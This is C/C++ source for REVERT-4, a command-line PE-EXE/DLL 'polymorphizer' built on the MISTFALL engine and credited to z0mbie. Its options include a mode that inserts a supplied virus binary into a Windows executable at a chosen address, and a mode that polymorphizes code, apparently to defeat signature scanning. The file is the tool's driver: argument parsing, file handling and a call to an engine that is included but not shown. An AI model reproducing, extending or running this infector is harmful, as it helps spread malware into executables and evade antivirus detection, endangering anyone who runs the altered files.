
#include <windows.h>

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <io.h>

#pragma hdrstop

int DUMP_MSG            = 1;
int DUMP_LOG            = 0;
int DUMP_DISASM         = 0;
int DUMP_TRY            = 0;
int TRY_DREF            = 1;
int TRY_RELREF          = 1;
int DISABLE_ERR_DISASM  = 0;
int CODEFIRST           = 1;
int STDSECT             = 1;
int USE_SIGMAN          = 1;
int USE_IMAGEBASE       = 0;
DWORD NEWBASE;

#include "MF\engine.hpp"
#include "MF\engine.cpp"
#include "MF\sigman.cpp"

#include "mutate.cpp"

extern "C"
int __cdecl disasm_main(BYTE*);   // length-disassembler interface

int __cdecl my_disasm(DWORD,BYTE* x)
{
  return disasm_main(x);
}

void* __cdecl my_malloc(DWORD,DWORD size)
{
  void* t = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, size);
  //GlobalAlloc(GPTR, size);
  assert(t);
  return t;
}

DWORD randseed;

DWORD __cdecl my_random(DWORD,DWORD range)
{
  return
    range == 0 ? 0 : (randseed = randseed * 214013 + 2531011) % range;
}

void help()
{
  printf("\n");
  printf("syntax: REVERT4 infile [outfile] [--option[-] [...]]\n");
  printf("\n");
  printf("option:\n");
  printf("  --dump-msg            dump debug messages\n");
  printf("  --dump-log-           dump debug log\n");
  printf("  --dump-disasm-        dump disassembly\n");
  printf("  --dump-try-           dump internal code analysis results\n");
  printf("  --try-dref            try to determine subroutines\n");
  printf("  --try-relref          search for relative references\n");
  printf("  --failbadop           fail when bad opcode found\n");
  printf("  --codefirst           assume code in 1st section only\n");
  printf("  --stdsect             standard section names only\n");
  printf("  --sigman              use signature manager\n");
  printf("  --imagebase:xxxxxxxx  change imagebase\n");
  printf("  --mode=nop            insert NOP between instructions\n");
  printf("  --mode=hooy           insert HOOY between instructions\n");
  printf("  --mode=morph          polymorphize file (default)\n");
  printf("  --mode=virus:filename insert virus into file (specify bin file) (==REVERT3)\n");
  printf("  --virus-va:xxxxxxxx   specify VA for code insertion\n");
  exit(0);
}

void main(int argc, char* argv[])
{
  printf("REVERT-4  1.00  PE-EXE/DLL polymorphizer  MISTFALL %s-based (x) 2000-2002 \n",MISTFALL_VERSION);
  printf("                right toolz for the right job --> http://z0mbie.cjb.net <-- \n");

  if (argc <= 1) help();

  char* ifile = 0;
  char* ofile = 0;
  struct
  {
    DWORD virsize;
    BYTE* virptr;
    DWORD insertVA;
  } data = {0,0,0};

  for(int i=1; i<argc; i++)
  {
    if (!stricmp(argv[i],"--dump-msg"))     DUMP_MSG = 1; else
    if (!stricmp(argv[i],"--dump-msg-"))    DUMP_MSG = 0; else
    if (!stricmp(argv[i],"--dump-log"))     DUMP_LOG = 1; else
    if (!stricmp(argv[i],"--dump-log-"))    DUMP_LOG = 0; else
    if (!stricmp(argv[i],"--dump-disasm"))  DUMP_DISASM = 1; else
    if (!stricmp(argv[i],"--dump-disasm-")) DUMP_DISASM = 0; else
    if (!stricmp(argv[i],"--dump-try"))     DUMP_TRY = 1; else
    if (!stricmp(argv[i],"--dump-try-"))    DUMP_TRY = 0; else
    if (!stricmp(argv[i],"--try-dref"))     TRY_DREF = 1; else
    if (!stricmp(argv[i],"--try-dref-"))    TRY_DREF = 0; else
    if (!stricmp(argv[i],"--try-relref"))   TRY_RELREF = 1; else
    if (!stricmp(argv[i],"--try-relref-"))  TRY_RELREF = 0; else
    if (!stricmp(argv[i],"--failbadop"))    DISABLE_ERR_DISASM = 0; else
    if (!stricmp(argv[i],"--failbadop-"))   DISABLE_ERR_DISASM = 1; else
    if (!stricmp(argv[i],"--codefirst"))    CODEFIRST = 1; else
    if (!stricmp(argv[i],"--codefirst-"))   CODEFIRST = 0; else
    if (!stricmp(argv[i],"--stdsect"))      STDSECT = 1; else
    if (!stricmp(argv[i],"--stdsect-"))     STDSECT = 0; else
    if (!stricmp(argv[i],"--sigman"))       USE_SIGMAN = 1; else
    if (!stricmp(argv[i],"--sigman-"))      USE_SIGMAN = 0; else
    if ( (!strncmpi(argv[i],"--imagebase:",12))&&(strlen(argv[i])==12+8) )
    {
      USE_IMAGEBASE = 1;
      sscanf(&argv[i][12],"%08X",&NEWBASE);
    }
    else
    if (!stricmp(argv[i],"--mode=nop"))     MODE = MODE_NOP; else
    if (!stricmp(argv[i],"--mode=hooy"))    MODE = MODE_HOOY; else
    if (!stricmp(argv[i],"--mode=morph"))   MODE = MODE_MORPH; else
                         //123456789ABCD
    if ( (!strncmpi(argv[i],"--mode=virus:",13))&&(strlen(argv[i])>13) )
    {
      MODE = MODE_VIRUS;
      char* vfile = &argv[i][13];
      printf(" reading %s\n", vfile);
      FILE*f=fopen(vfile,"rb");
      if (f==NULL)
      {
        printf("ERROR:cant read from %s\n",vfile);
        exit(0);
      }
      data.virsize = filelength(fileno(f));
      data.virptr  = new BYTE[ data.virsize+1 ];
      assert(data.virptr);
      assert(fread(data.virptr, 1,data.virsize, f)==data.virsize);
      fclose(f);
    }
    else                   //123456789AB
    if ( (!strncmpi(argv[i],"--virus-va:",11))&&(strlen(argv[i])==11+8) )
    {
      sscanf(&argv[i][11],"%08X",&data.insertVA);
    }
    else
    {
      if (ifile==0)
        ifile=argv[i];
      else
        if (ofile==0)
          ofile=argv[i];
        else
        {
          printf("ERROR:unrecognized cmdline parameter: %s\n", argv[i]);
          help();
        }
    }
  }
  if (ofile==0) ofile=ifile;

  printf(" reading %s\n", ifile);
  FILE*f=fopen(ifile,"rb");
  if (f==NULL)
  {
    printf("ERROR:cant read from %s\n", ofile);
    exit(0);
  }
  DWORD bufsize = filelength(fileno(f));
  DWORD maxbufsize = bufsize * 4 + 131072;
  BYTE* buf = new BYTE[maxbufsize];
  assert(buf);
  assert(fread(buf, 1,bufsize, f)==bufsize);
  fclose(f);

  randseed = GetTickCount();

  printf(" executing MISTFALL %s engine:\n", MISTFALL_VERSION);

  int res;

  __try
  {
  res = engine((DWORD)&data,    // user-parameter
               buf,             // buffer
               bufsize,         // input buffer size
               &bufsize,        // ptr to output buffer size
               maxbufsize,      // maximal buffer size
               my_disasm,       // disassembler
               my_malloc,       // malloc
               my_random,       // random
               my_mutate,       // mutator
               my_sigman);      // signature manager
  }
  __except (1)
  {
  res = -1;
  }

  printf("  engine() returns %s\n",
    res == -1           ? "***EXCEPTION***" :
    res == ERR_SUCCESS  ? "OK" :
    res == ERR_BADFILE  ? "ERR_BADFILE" :
    res == ERR_NOMEMORY ? "ERR_NOMEMORY" :
    res == ERR_SHORTSUX ? "ERR_SHORTSUX":
    res == ERR_MUTATE   ? "ERR_MUTATE" :
    res == ERR_DISASM   ? "ERR_DISASM" :
    "???");

  if (res==ERR_SUCCESS)
  {

    printf(" writing %s\n", ofile);
    f=fopen(ofile,"wb");
    if (f==NULL)
    {
      printf("ERROR:cant write to %s\n", ofile);
      exit(0);
    }
    assert(fwrite(buf, 1,bufsize, f)==bufsize);
    fclose(f);

  }

  printf(" exiting\n");
}//main
